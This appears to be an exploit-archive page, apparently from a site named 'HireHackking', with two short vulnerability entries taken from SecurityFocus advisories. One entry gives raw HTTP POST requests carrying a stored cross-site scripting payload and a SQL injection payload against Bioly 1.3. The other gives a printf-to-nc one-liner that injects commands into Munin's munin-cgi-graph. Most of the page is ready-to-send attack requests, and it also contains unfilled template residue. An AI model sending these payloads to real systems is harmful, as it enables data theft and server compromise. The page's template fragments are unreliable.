source: https://www.securityfocus.com/bid/53018/info Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Bioly 1.3 is vulnerable; other versions may also be affected. Cross Site Scripting POST /index.php?action=3 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: STORED XSS TEST Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache # [Post Data:]==> email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1 SQL Injection POST /index.php?action=11 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Sql Injection Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache # [Post Data:]==> q=%00'
HireHackking

Munin 2.0~rc4-1 - Remote Command Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80